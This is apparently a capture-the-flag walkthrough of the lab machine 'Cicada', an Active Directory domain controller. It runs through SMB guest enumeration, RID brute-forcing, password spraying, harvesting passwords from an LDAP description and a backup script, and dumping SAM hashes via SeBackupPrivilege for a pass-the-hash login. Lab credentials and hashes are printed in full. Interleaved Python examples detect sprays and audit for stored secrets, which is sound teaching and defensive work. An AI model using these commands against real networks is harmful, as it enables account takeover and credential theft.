Machine Card listing Cicada as an easy Windows box

Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 19:51:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
|   date: 2024-09-29T19:52:34
|_  start_date: N/A

Based on the open ports I’m dealing with a Domain Controller for the cicada.htb domain with the DNS name of cicada-dc.cicada.htb. I’ll add both to /etc/hosts before proceeding.

Initial Access

First off I check whether SMB can be accessed without an account or with the guest account. Without credentials the server denies access, but the guest user is able to list the shares and also has READ access to HR and IPC$.

$ nxc smb cicada.htb -u '' -p '' --shares
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\: 
SMB         10.129.180.234  445    CICADA-DC        [-] Error enumerating shares: STATUS_ACCESS_DENIED
 
$ nxc smb cicada.htb -u 'guest' -p '' --shares
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.180.234  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.180.234  445    CICADA-DC        -----           -----------     ------
SMB         10.129.180.234  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.180.234  445    CICADA-DC        C$                              Default share
SMB         10.129.180.234  445    CICADA-DC        DEV                             
SMB         10.129.180.234  445    CICADA-DC        HR              READ            
SMB         10.129.180.234  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.180.234  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.180.234  445    CICADA-DC        SYSVOL                          Logon server share

Listing all files on the HR share only returns Notice from HR.txt, which I download to have a closer look.

$ nxc smb cicada.htb -u 'guest' -p '' --spider HR --regex "."
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.180.234  445    CICADA-DC        [*] Started spidering
SMB         10.129.180.234  445    CICADA-DC        [*] Spidering .
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/. [dir]
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/.. [dir]
SMB         10.129.180.234  445    CICADA-DC        //10.129.180.234/HR/Notice from HR.txt [lastm:'2024-08-28 19:31' size:1266]
SMB         10.129.180.234  445    CICADA-DC        [*] Done spidering (Completed in 0.1164097785949707)
 
$ nxc smb cicada.htb -u 'guest' -p '' --share HR --get-file "Notice from HR.txt" "Notice from HR.txt"
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        [*] Copying "Notice from HR.txt" to "Notice from HR.txt"
SMB         10.129.180.234  445    CICADA-DC        [+] File "Notice from HR.txt" was downloaded to "Notice from HR.txt"

The notice from the human resources department seems to be a welcome message for new hires. It lists the default password Cicada$M6Corpb*@Lp#nZp!8 and provides instructions on how to change it.

Notice from HR.txt
Dear new hire!
 
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
 
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
 
To change your password:
 
1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
 
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
 
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
 
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
 
Best regards,
Cicada Corp

Since it’s more of a generic note, it does not include a username to use alongside the password. With the help of nxc it’s also possible to brute-force valid users by incrementing the relative identifier (RID)[1].
Doing so returns multiple (well-known) groups and users. I’ll add the usernames (without domain) to a text file.

$ nxc smb cicada.htb -u 'guest' -p '' --rid-brute
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.180.234  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.180.234  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
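Building that users.txt by hand works for a handful of accounts; the following added example (my code, not part of the writeup) parses the nxc --rid-brute output format shown above and applies the same filter the author applied implicitly: keep SidTypeUser objects with a RID of 1000 or higher (everything below is a built-in such as Administrator, Guest or krbtgt) and drop machine accounts, which end in "$". The embedded sample is a constructed subset of the output above, and the regex assumes nxc's "<rid>: <DOMAIN>\<name> (<SidType>)" line layout.

```python
import re

# Constructed subset of the nxc --rid-brute output above (same format, fewer lines).
RID_BRUTE_OUTPUT = """\
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\\guest:
SMB         10.129.180.234  445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        513: CICADA\\Domain Users (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1106: CICADA\\michael.wrightson (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1108: CICADA\\david.orelious (SidTypeUser)
SMB         10.129.180.234  445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.129.180.234  445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Matches "<rid>: <DOMAIN>\<name> (<SidType>)" at the end of an nxc output line.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(text):
    """Return (rid, name, sid_type) for every resolved RID in nxc --rid-brute output."""
    records = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            records.append((int(m.group("rid")), m.group("name"), m.group("kind")))
    return records


def human_accounts(records, min_rid=1000):
    """Keep user objects created by the domain's admins.

    Well-known RIDs (Administrator=500, Guest=501, krbtgt=502 and the built-in
    groups) sit below 1000; domain-created objects start at 1000. Machine
    accounts carry a trailing "$" and are not spray targets."""
    return [
        name for rid, name, kind in records
        if kind == "SidTypeUser" and rid >= min_rid and not name.endswith("$")
    ]


if __name__ == "__main__":
    # Redirect stdout to users.txt to get the list the writeup feeds into nxc.
    print("\n".join(human_accounts(parse_rid_brute(RID_BRUTE_OUTPUT))))
```

From the defender's side the interesting part is not the parser but the fact that it runs at all: the enumeration works over a guest session, so an enabled Guest account on a domain controller hands out the full user list to anyone on the network.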

Maybe one of those users did not change the default password, which would let me take over the account. By spraying the password I can quickly see that it is still valid for michael.wrightson.

$ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.180.234  445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
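A spray like the one above is easy to spot on the domain controller: one source address, many different accounts, one failed logon each, all within a few seconds. The following added example (my code, not from the writeup) runs that detection over a constructed sample of Windows Security events, where 4625 is a failed logon and 4624 a successful one; the source addresses and timestamps are made up. On a real DC the same logic applies to 4776 (NTLM validation) and 4771 (Kerberos pre-authentication failure) events as well.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log sample (4625 = failed logon, 4624 = successful logon),
# modelled on what the spray above would leave behind. Source addresses are made up.
SAMPLE_EVENTS = [
    # one source, five different accounts, seconds apart: the spray
    {"time": "2024-09-29T19:55:01", "id": 4625, "user": "john.smoulder",     "src": "10.10.14.5"},
    {"time": "2024-09-29T19:55:02", "id": 4625, "user": "sarah.dantelia",    "src": "10.10.14.5"},
    {"time": "2024-09-29T19:55:03", "id": 4624, "user": "michael.wrightson", "src": "10.10.14.5"},
    {"time": "2024-09-29T19:55:04", "id": 4625, "user": "david.orelious",    "src": "10.10.14.5"},
    {"time": "2024-09-29T19:55:05", "id": 4625, "user": "emily.oscars",      "src": "10.10.14.5"},
    # a workstation user mistyping their own password twice: not a spray
    {"time": "2024-09-29T19:57:10", "id": 4625, "user": "emily.oscars",      "src": "10.129.180.50"},
    {"time": "2024-09-29T19:57:25", "id": 4625, "user": "emily.oscars",      "src": "10.129.180.50"},
    {"time": "2024-09-29T19:57:40", "id": 4624, "user": "emily.oscars",      "src": "10.129.180.50"},
]


def detect_spray(events, window_minutes=5, min_accounts=4):
    """Alert on a source that fails logons for many distinct accounts within one window.

    A user mistyping their password produces many failures for one account; a
    spray produces few failures per account across many accounts. Any 4624 from
    the same source inside the window is reported as a likely successful guess."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for src, items in by_src.items():
        items.sort(key=lambda pair: pair[0])
        # slide a window over this source's events, starting at each event in turn
        for i, (start, _) in enumerate(items):
            failed, succeeded = set(), set()
            for t, e in items[i:]:
                if t - start > window:
                    break
                (failed if e["id"] == 4625 else succeeded).add(e["user"])
            if len(failed) >= min_accounts:
                alerts.append({
                    "src": src,
                    "window_start": start.isoformat(),
                    "failed_accounts": sorted(failed),
                    "successes": sorted(succeeded),
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"spray from {a['src']} starting {a['window_start']}: "
              f"{len(a['failed_accounts'])} accounts tried, compromised: {a['successes']}")
```

The threshold of four distinct accounts per five minutes is deliberately low for the sample; in production it is tuned against the normal failure rate, and the "successes" field is what turns the alert from "someone is guessing" into "someone is in", which is exactly what happened to michael.wrightson here.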

Using the credentials for michael.wrightson does not grant additional access on SMB, but I can use them to connect to Active Directory through LDAP and dump the users along with their descriptions.
This returns the credentials david.orelious:aRt$Lp#7t*VQ!3.

$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.129.180.234  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.180.234  389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP        10.129.180.234  389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
LDAP        10.129.180.234  389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.129.180.234  389    CICADA-DC        Administrator                 2024-08-26 20:08:03 0       Built-in account for administering the computer/domain
LDAP        10.129.180.234  389    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain
LDAP        10.129.180.234  389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 0       Key Distribution Center Service Account
LDAP        10.129.180.234  389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2
LDAP        10.129.180.234  389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2
LDAP        10.129.180.234  389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
LDAP        10.129.180.234  389    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.129.180.234  389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1

With the newly obtained credentials I do get access to the SMB share Dev where I find and download a file called Backup_Script.ps1.

$ nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --spider Dev --regex "."
SMB         10.129.180.234   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.180.234   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.180.234   445    CICADA-DC        [*] Started spidering
SMB         10.129.180.234   445    CICADA-DC        [*] Spidering .
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/.. [dir]
SMB         10.129.180.234   445    CICADA-DC        //10.129.180.234/Dev/Backup_script.ps1 [lastm:'2024-08-28 19:28' size:601]
SMB         10.129.180.234   445    CICADA-DC        [*] Done spidering (Completed in 0.11278557777404785)
 
Checking its contents, I find the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt. Those allow me to log into the machine via WinRM and collect the first flag.

Backup_Script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
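Both of the last two steps came down to a password stored somewhere every domain user can read: once in an AD user description (david.orelious), once in a script on a share (Backup_Script.ps1). The following added example (my code, not from the writeup) is the audit a defender would run to catch both before an attacker does: a small set of credential patterns applied to user descriptions and to script contents. The inputs are constructed; the david.orelious description and the script lines are the ones from the dumps above, while the svc_backup entry is made up to show that the free-text pattern also catches "pwd:" style notes.

```python
import re

# Constructed inputs modelled on the two findings above: a few AD user descriptions
# (the david.orelious text is the real one from the LDAP dump) and the backup script.
USER_DESCRIPTIONS = {
    "Administrator": "Built-in account for administering the computer/domain",
    "michael.wrightson": "",
    "david.orelious": "Just in case I forget my password is aRt$Lp#7t*VQ!3",
    "svc_backup": "Backup service account, pwd: Winter2024!",   # constructed, not on the box
}

BACKUP_SCRIPT = r'''
$sourceDirectory = "C:\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''

PATTERNS = [
    # free text: "password is X", "pwd: X" (descriptions, comments, tickets)
    ("keyword", re.compile(r"\b(?:password|passwd|pwd)\b\s*(?:is|:)\s*(\S+)", re.I)),
    # PowerShell: a string literal being turned into a SecureString
    ("securestring", re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    # PowerShell: $password = "literal"
    ("assignment", re.compile(r'\$(?:password|passwd|pwd|pass)\s*=\s*"([^"]+)"', re.I)),
]


def find_secrets(source, text):
    """Return (source, pattern_name, secret) for each credential-looking literal in text."""
    hits = []
    for name, rx in PATTERNS:
        for m in rx.finditer(text):
            hits.append((source, name, m.group(1)))
    return hits


def audit_descriptions(descriptions):
    """Scan AD user descriptions (readable by every authenticated user) for stored passwords."""
    return [hit for user, text in descriptions.items()
            for hit in find_secrets(f"ldap:{user}", text)]


def audit_script(path, text):
    """Scan a script found on a share for embedded credentials."""
    return find_secrets(f"file:{path}", text)


if __name__ == "__main__":
    for source, pattern, secret in (audit_descriptions(USER_DESCRIPTIONS)
                                    + audit_script("Backup_Script.ps1", BACKUP_SCRIPT)):
        print(f"{source}: {pattern} -> {secret[:3]}{'*' * (len(secret) - 3)}")
```

In a live environment the description dictionary would be filled from an LDAP query for the description attribute of all user objects, and the script scan would walk every share the Domain Users group can read; the fix in both cases is the same, move the secret into a managed service account or a vault and clear the attribute or file.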

Privilege Escalation

The account emily.oscars has SeBackupPrivilege enabled, letting me save the SAM and SYSTEM registry hives and extract the NTLM hash of the Administrator account from them.

whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

First I’ll dump the registry hives and then download them via evil-winrm’s built-in download feature to my local machine.

# In Evil-WinRM session
reg save hklm\sam sam
reg save hklm\system system
 
# Download the files (takes a bit)
download sam
download system

After downloading the files I can pass them to secretsdump.py from impacket to extract the hashes for all local accounts including the Administrator.

$ impacket-secretsdump -system SYSTEM -sam SAM local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
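The secretsdump output above carries more than the one hash the writeup needs. The following added example (my code, not from Impacket or the writeup) parses the "user:rid:lmhash:nthash:::" lines and reads out what a defender wants from a SAM dump: accounts with no password (their NT hash is the hash of the empty string, 31d6cfe0d16ae931b73c59d7e0c089c0), accounts whose LM hash is still stored (anything other than the empty-LM placeholder aad3b435b51404eeaad3b435b51404ee), and accounts that share an NT hash, which means they share a password. The sample is a constructed copy of the output above plus one made-up local account (svc_backup) reusing the Administrator hash, so the reuse check has something to find.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has no password

# Constructed copy of the secretsdump output above, plus a made-up local account
# (svc_backup) that reuses the Administrator password, to exercise the reuse check.
SECRETSDUMP_OUTPUT = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
"""

# One hash record per line; status lines ([*], [-]) do not match and are skipped.
HASH_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_secretsdump(text):
    """Parse 'user:rid:lmhash:nthash:::' lines into dicts with lower-cased hashes."""
    rows = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            rows.append({"user": m.group("user"), "rid": int(m.group("rid")),
                         "lm": m.group("lm").lower(), "nt": m.group("nt").lower()})
    return rows


def triage(rows):
    """Blank passwords, LM hashes still stored, and accounts sharing one NT hash."""
    report = {"blank_password": [], "lm_stored": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            report["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            report["lm_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    # the empty hash is excluded here: it is reported under blank_password instead
    report["shared_nt"] = {h: users for h, users in by_nt.items()
                           if h != EMPTY_NT and len(users) > 1}
    return report


if __name__ == "__main__":
    rep = triage(parse_secretsdump(SECRETSDUMP_OUTPUT))
    print("no password set :", rep["blank_password"])
    print("LM hash stored  :", rep["lm_stored"])
    for h, users in rep["shared_nt"].items():
        print(f"same password   : {users} (NT {h[:8]}...)")
```

Guest and DefaultAccount showing a blank hash is normal for disabled built-ins; the same line on an enabled account means it logs on without a password. The shared-hash check is the one that matters after a SAM dump: a local account that reuses the Administrator password is an extra path to the same hash.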

Obtaining the hash for the Administrator account lets me authenticate with it via WinRM and collect the final flag.

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

Attack Path

flowchart TD

subgraph "Initial access"
    A(Guest Access to SMB) -->|Note from HR| B(Default password)
    A -->|RID Bruteforce| C(List of users)
    B & C -->|Password Spraying| D(Credentials for michael.wrightson)
    D -->|Dump LDAP Descriptions| E(Credentials for david.orelious)
    E -->|Access to Dev SMB Share| F(Credentials for emily.oscars)
end

subgraph "Privilege Escalation"
    F -->|SeBackupPrivilege| G(Backup SAM and SYSTEM registry hives)
    G -->|secretsdump| H(Hash for Administrator)
end

Footnotes

  1. Enumerate Users by Bruteforcing RID